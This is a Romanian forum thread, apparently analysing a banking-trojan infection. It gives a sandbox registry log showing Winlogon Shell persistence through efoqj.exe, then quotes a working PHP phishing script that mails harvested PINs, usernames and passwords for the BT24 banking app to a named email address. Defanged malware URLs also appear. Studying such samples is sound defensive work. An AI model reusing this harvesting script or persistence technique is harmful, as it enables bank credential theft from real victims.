Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printShareName	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printSpooling	PrintWhileSpooling
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printStartTime	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printerName	Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\priority	1
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\serverName	tdx-f66aad8b5aa
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\shortServerName	TDX-F66AAD8B5AA
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\uNCName	\\tdx-f66aad8b5aa\Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\versionNumber	4
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Location	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Name	Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\ObjectGUID	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Parameters	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Port	XPSPort:
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Print Processor	WinPrint
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Printer Driver	Microsoft XPS Document Writer
Reg Key	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\FeatureKeyword	BINARY SIZE=2 MD5=C4103F122D27677C9DB144CAE1394A66
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\FeatureKeywordSize	2
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\Forms?	1928778442
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\InitDriverVersion	1536
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\Model	Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\PrinterData	BINARY SIZE=560 MD5=5FB20305A4C8E1AD8D66FD7E37635F2B
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\PrinterDataSize	560
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Priority	1
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Security	BINARY SIZE=296 MD5=EDE42992E3DB259C8A86D09BD50BECAC
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Separator File	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Share Name	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\SpoolDirectory	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\StartTime	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Status	128
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\UntilTime	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\dnsTimeout	15000
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\txTimeout	45000
Reg Val	Changed	HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU	"BINARY SIZE=16 MD5=550E494259E68F9603C0FE07F980E70A"	(old value="BINARY SIZE=16 MD5=9C9E0BB1A9F364BDB4CDF118969A58CF")
Reg Val	Changed	HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Nqzvavfgengbe\Qrfxgbc\FlfgrzRkcybere.rkr	"BINARY SIZE=16 MD5=3DC276E175808868AA64F536B191C23D"	(old value="BINARY SIZE=16 MD5=3FC172AEE3B4D3BBC719B443C1DABF4A")
Reg Val	Changed	HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG	"BINARY SIZE=16 MD5=11AFA458E635DEBA46531A1C99EF2181"	(old value="BINARY SIZE=16 MD5=7026A6639D6AD5BE21DD2A3FEE0CBBD7")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\PresentationCore, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\1\ImageList	"BINARY SIZE=2530 MD5=DA7AFF9DB0DC3478F0C33B9E7B8101C8"	(old value="BINARY SIZE=2514 MD5=A8DBF25B79426BF0B2A7496BAED06DC0")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\PresentationFramework, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\1\Status	"3"	(old value="2")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed	"BINARY SIZE=80 MD5=0ABF1D074E505CE9E52F8BD027337E03"	(old value="BINARY SIZE=80 MD5=DAD86B2FE383EA7978D57922BD8A402D")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\ILUsageMask	"BINARY SIZE=2 MD5=B08B7C15585E653ED9D7F4A0A186496F"	(old value="BINARY SIZE=2 MD5=FB73C139137BCCFEE5D95BDDB087480A")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex	"95"	(old value="94")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NIUsageMask	"BINARY SIZE=1 MD5=31741635B41D535098241FEA03C1E47F"	(old value="BINARY SIZE=1 MD5=8C493A43D8C1EF798860BB02B62E8E79")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Refresh	"0"	(old value="1")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\WINDOWS\System32\Drivers\HTTP.sys[UlMofResource]	"LowDateTime:740033152,HighDateTime:30036388***Binary mof compiled successfully"	(old value="LowDateTime:560696064,HighDateTime:29883216***Binary mof compiled successfully")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\WBEM\WDM\C:\WINDOWS\System32\Drivers\HTTP.sys[UlMofResource]	"LowDateTime:740033152,HighDateTime:30036388***Binary mof compiled successfully"	(old value="LowDateTime:560696064,HighDateTime:29883216***Binary mof compiled successfully")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Counter	"4088"	(old value="4074")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Help	"4089"	(old value="4075")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	"Explorer.exe ,C:\WINDOWS\system32\efoqj.exe"	(old value="Explorer.exe")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\First Counter	"4076"	(old value="3424")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\First Help	"4077"	(old value="3425")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Last Counter	"4088"	(old value="3436")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Last Help	"4089"	(old value="3437")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Object List	"4076 4082"	(old value="3424 3430")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count	"0"	(old value="1")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance	"0"	(old value="1")
Reg Key	Deleted	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d
Reg Val	Deleted	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d\ILUsageMask	BINARY SIZE=1 MD5=00594FD4F42BA43FC1CA0427A0576295
Reg Val	Deleted	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d\NIUsageMask	BINARY SIZE=1 MD5=EC2D11028766E06AC33648E2F0A67320
Reg Val	Deleted	HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0	SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}

[ROFL]

Ce am gasit pe pagina specificata de tdxev hxxp://profilexx.haos.ro:

Un fisier numit <gohi.php> care contine:

Code:

<?php

        $val=$_POST['nume']."  ".$_POST['PIN']."  ".$_POST['comp']."  ".$_POST['oras']."  ".$_POST['reg']."  ".$_POST['user']."  ".$_POST['pass'];


$to = "alinuzza235@yahoo.com";
$subject ="From ip: ".getenv("REMOTE_ADDR");
$email ="fraier@tds.com" ;
$message =$val;
$headers = "From: $email";
$sent = mail($to, $subject, $message, $headers) ;
if($sent)
{
print "Accesati din nou aplicatia BT24 pentru autentificare.";
 }
else
{print "ERROR"; }


?>

Probabil trimite serverul un request la asta si primeste el log-urile la adresa <alinuzza235@yahoo.com>.

Mai gasim pe acolo:

hxxp://profilexx.haos.ro/server.exe
hxxp://profilexx.haos.ro/profile.php
hxxp://profilexx.haos.ro/index.htm(identic cu profile.php)

[Gugulica]

Nu reusesc sa-l sterg . Nu-mi apare nici un excutabil cu iconita de explorer.Alte metode ?

[SympleBoy22]

E foarte cul virusul.Il detecteaza 20 antivirusi...Asta da virus.